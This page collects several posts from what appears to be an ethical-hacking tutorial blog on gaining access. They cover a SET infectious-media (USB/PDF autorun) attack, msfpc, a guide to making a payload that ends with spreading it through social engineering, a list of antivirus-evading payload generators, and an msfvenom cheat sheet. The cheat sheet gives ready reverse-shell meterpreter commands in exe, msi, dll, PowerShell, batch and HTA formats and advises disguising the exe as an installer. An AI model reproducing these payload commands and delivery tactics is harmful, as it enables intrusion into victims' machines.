Category: Gaining Access

Posted on by

Social Engineering Toolkit (SET): Beginners guide

Hello, aspiring ethical hackers. In our previous article, you learnt what is social engineering and various types of social engineering attacks. In this article, you will learn about Social Engineering Toolkit (SET), an open-source pen testing framework designed for performing versatile social engineering attacks.

Let’s see how this tool works. For this, we will be using Kali Linux as SET in installed by default in it. You can start SET using the command shown below.

sudo setoolkit

When it prompts you to agree to “terms of services”, type “Y”.

Then the primary menu of Social Engineering Toolkit is displayed to you.

The primary menu of SET is divided into seven sections. The first one consists of all the social engineering attacks that you can perform with SET tool.

These include attacks like spear phishing, phishing etc. The second one consists of all the penetration testing attacks like MSSQL brute forcing attack etc.

Third in the list is all the third party modules included in SET.

These include attacks like Google analytics attack, RATTE attack etc.

The 4th, 5th, 6th and 7th options are used to update SET, update SET configuration, help and exit option for SET respectively.

Now, let’s see how to perform an attack with SET. For this blogpost, let’s create a infectious media. An infectious media attack is an attack in which a media like DVD,CD or USB drive is infected with malicious payloads and left close to our intended target users. Called a Road apple attack, the idea behind this is that an employee may get enticed by the free media that he got and insert it in his office devices to check what it has. In infectious media attack, the payload hosted in media is configured to run automatically as soon as the device is inserted, This is possible by including a AUTORUN.INF file along with the payload.

To create this attack, I select option 3 in the menu of social engineering attacks.

As you can see in the above image, it will create a metasploit payload along with “AUTORUN.INF” file.

I select the first option, the file format exploit method. After selecting this, you need to enter IP address for the reverse connection (Listener IP address). After doing this, it will prompt you to select the file format you want your payload to take.

By default, it uses the PDF embedded exe. In this, an Exe file is embedded inside the PDF file. I will go with the default option. Next, it will prompt you if your want to use your own PDF or a built in blank PDF for this attack.

For higher success rate of infecting with this attack vector, it is highly recommended to use a custom PDF. However, for this tutorial, I will use the default blank PDF. It’s time to select the payload.

Select the payload you want and assign the listener IP and listener port. These are given automatically by SET tool itself. If you want to make any changes, you can make them. Otherwise, just hit ENTER.

You can start the listener immediately from SET or later through Metasploit. The payload and AUTORUN.INF file are saved “SET”. The attack vector is saved with the name “template.pdf”. This file along with AUTORUN.INF file need to be placed on the media of your choice (CD/DVD/USB), thus completing the infectious media attack.

Learn how to perform a phishing attack with Weeman HTTP server and GoPhish.

Posted on by

Beginners guide to msfpc

Hello, aspiring ethical hackers. In our previous blogpost, you learnt how to create payloads with msfvenom. In this blogpost, you will learn about MSFPC (MSFvenom payload creator), a tool that simplifies generation of Metasploit payloads with msfvenom.

MSFvenom payload creator (MSFPC) is a wrapper to generate multiple types of payloads based on users choice. The concept of this tool is to be as simple as possible while generating a payload.

Let’s see how to use this tool. For this, we will be using Kali Linux, as msfpc is installed by default on Kali Linux.

The simplest way to create a payload using MSFPC is to specify the type of payload you want. MSFPC can generate APK, ASP, ASPx, bash (-sh), Java (.jsp), Linux (.elf), OSX (macOS), Perl (.pl), PHP, PowerShell (.ps1), Python, Tomcat (.war) and Windows (.exe or dll) payloads.

For example, let’s see how to generate an exe payload.

The only option we need to set to create a payload with msfpc is the attacker system’s IP address or the listener address which can be selected from the given options. All other options are automatically set.

By default, this tool creates a reverse shell payload. We can also create a bind shell payload as shown below.

By default the listening port of the generated payload is set to 443. This can be changed as shown below.

We can also create payloads with this tool by specifying the target operating system.

MSFPC creates staged payloads by default. We can also create stageless payload as as shown below.

Posted on by

How to create a payload

Hello, aspiring ethical hackers. In this blogpost, you will learn what is a payload and how to create a payload manually. Note that it is only for educational and knowledge purposes and not for performing any malicious actions. The aim of this article is to give you a basic understanding on how to create a payload. Let’s start with defining what exactly is a payload.

What is a payload?

A payload in cyber security is a piece of code that is executed after successfully running an exploit to take advantage of a vulnerability. When a Proof Of Concept (POC) for a vulnerability is disclosed, this allows most hackers around the world to execute their chosen payloads. This payload can be anything from malware, reverse shell, RAT, ransomware etc or their own custom payload.

For example, ms08_067 vulnerability was exploited in real-world to deploy Conficker worm payload, but while pen testing with Metasploit, meterpreter is used as payload. Although payloads can be created using payload generators simply, it would be very thrilling and educative to create manually.

Creation of a computer payload consists of six steps. They are,

  1. Decide the function you want your payload to perform.
  2. Select a programming language in which you want to code your payload.
  3. Code the payload.
  4. Compiling the payload.
  5. Testing.
  6. Sharing the payload.

Let’s learn about each step in detail.

1. Function of a payload:

Before you even start coding a payload, you need to decide what exactly you want your payload to do. In real-world, payloads perform many functions that include downloading and installing additional payloads, wiping data from the infected system and even taking complete control of the system. For example, I decide that my payload should open a Firefox browser when executed.

2. Choose your language:

After deciding the function you want your payload to perform, next thing you have to do is choose a programming language to code this payload. Payloads can be written in many programming languages like C, Delphi, Visual Basic, C#, C++, Cobol, Ruby, Python etc. They can also be created using scripting languages like JavaScript, Batch script, Bash, PowerShell etc. Choose the programming or scripting language of your choice. For example, I want to write my payload in Batch scripting.

3. Write code:

Once you select the programming language or scripting language, you need to code the payload. To code a batch script, all I have to do is open a notepad, add the code shown below and save the file as Batch file (with extension .bat)

@echo off
start firefox.exe

4. Compile (if necessary):

Compile the payload. Compiling is a process of converting source code into machine-readable code so that a computer can execute it. Since we have written our code in Batch, it doesn’t need any compilation. But programs written in C,C++, Python need compiling. Compiled programs are usually fast.

5. Test the payload:

Once you have finished coding the virus and compiling it, test its working by executing the virus. I execute the Batch virus I created and it open Firefox browser as shown below.

6. Share the virus:

The last step is to share the payload to make your target user execute it. Normally hackers use social engineering or phishing schemes to spread the paylaod.

Posted on by

Beginners guide to Payload generators

Hello, aspiring ethical hackers. In our previous blogpost, you have learnt about types of Metasploit payloads, what is a payload etc. In this blogpost you will learn what is a payload generator and popular payload generators.

What is a payload?

A payload in cyber security is a piece of code that is executed after successfully running an exploit to take advantage of a vulnerability. When a Proof Of Concept (POC) for a vulnerability is disclosed, this allows most hackers around the world to execute their chosen payloads. This payload can be anything from malware, reverse shell, RAT, ransomware etc or their own custom payload.

For example, ms08_067 vulnerability was exploited in real-world to deploy Conficker worm payload, but while pen testing with Metasploit, meterpreter is used as payload. Although payloads can be created manually, it would be very simple to make payloads with payload generators.

What is a payload generator?

Any software or application that helps us to automatically create a payload to be used in a pen test is known as a payload generator. Payloads can be a simple one liner or multiple lines of complex code. Whatever it is, it is payload generator makes our work very simple. Let’s learn about some of the popular payload generators.

1. MSF venom:

MSF venom is a payload generator from Metasploit framework that can be pretty useful in generating payloads for windows hacking, Linux hacking, web application hacking and even mobile hacking. MSF venom is a replacement to MSF payload earlier. Learn more about msfvenom.

2. Veil-Framework:

Veil-Framework is a tool that can generate Metasploit payloads that bypass common anti-virus solutions. Veil-framework is officially supported by Debian 8 and Kali Linux rolling 2018+. It may also be run on Arch Linux, Manjaro Linux, Black Arch Linux, Deepin 15+, Elementary, Fedora 22+, Linux Mint, Parrot Security, Ubuntu 15.10+ and Void Linux. Learn more about Veil Framework.

3. Msfpc:

MSFvenom Payload Creator (MSFPC) is a wrapper that can generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.

4. WinPayloads:

This tool can generate undetectable Windows payloads.

5. Arcanus Framework:

ARCANUS is a customized payload generator/handler for penetration testing that can generate both Linux and Windows payloads. Learn more about Arcanus Framework.

6. Hercule’s Framework:

HERCULES is a customizable payload generator to generate Windows and Linux payloads that bypass antivirus software.

Posted on by

Msfvenom cheatsheet for beginners

Hello, aspiring ethical hackers. In one of our previous blogposts you have learnt what is payload and different types of payloads. In this article, you will learn about msfvenom, one of the most popular (if not the most popular) payload creators used in pen testing.

What is a payload?

A payload in cyber security is a piece of code that is executed after successfully running an exploit to take advantage of a vulnerability. When a Proof Of Concept (POC) for a vulnerability is disclosed, this allows most hackers around the world to execute their chosen payloads. This payload can be anything from malware, reverse shell, RAT, ransomware etc or their own custom payload. For example, ms08_067 vulnerability was exploited in real-world to deploy Conficker worm, but while pen testing, a meterpreter payload is used most probably.

What is msfvenom?

MSF venom is a payload generator from Metasploit framework that can be pretty useful in generating payloads for windows hacking, Linux hacking, web application hacking and even mobile hacking. MSFvenom is a replacement to MSF payload earlier.

With the rise in quick patching of zero-day vulnerabilities by organizations, the role of payloads will become more important day by day. Whether it is exploiting a vulnerability or using social engineering the payload plays a very important role in ethical hacking.

MSFvenom is widely used to generate various payloads as requirement during pen testing. Let’s see how it works. All pen testing distros have msfvenom installed by default as part of Metasploit framework. We are using Kali Linux for this tutorial.

You can see all the payloads you can create using MSFvenom using the command “msfvenom-l” .

Now, let’s see how to create payloads with MSFvenom. The primary requirements while creating a payload using MSFvenom are,

-p: payload you want to create

lhost: the IP address you want your shell to connect to

lport: the port of IP address you want your shell to connect to.

-f: Format of the payload.

Most probably, payloads in msfvenom are used to get a reverse shell (Learn about various types of shells). Let’s create a Windows executable payload. The primary files used in Windows are executable (exe) files. These files are used by Windows users to install applications and programs. So. all we have to do is create a exe payload using msfvenom and masquerade it as an installer and we are good to go. Here’s the command.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f exe > hc_rs.exe

Apart from exe files, there are also other executables that are used for installing various applications in Windows. MSI stands for Microsoft Software Installer. Here’s how we can create a MSI payload with msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f msi > hc_rs.msi

Dynamic Link Library (DLLs) are library files in Windows that contain code that is commonly used by multiple programs and applications in Windows. These type of payloads are used in infection chains while trying to infect a system.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f dll > hc_rs.dll

PowerShell is soon becoming (or already became) one of the favorite scripting languages of hackers. Here is how we create a PowerShell payload using msfvenom.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f psh > hc_rs.ps1

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f psh-cmd > -f raw

Before PowerShell there was only Batch scripting in Windows systems. We can also create Batch payloads using msfvenom as shown below.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444  > hc_rs.bat

The newest file type to be used by hackers in their infection chains is HTML application file type (HTA). HTA’s are typically a web page. Here’s how to create a HTA payload.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.40.169 lport=4444 -f hta-psh > hc_rs.hta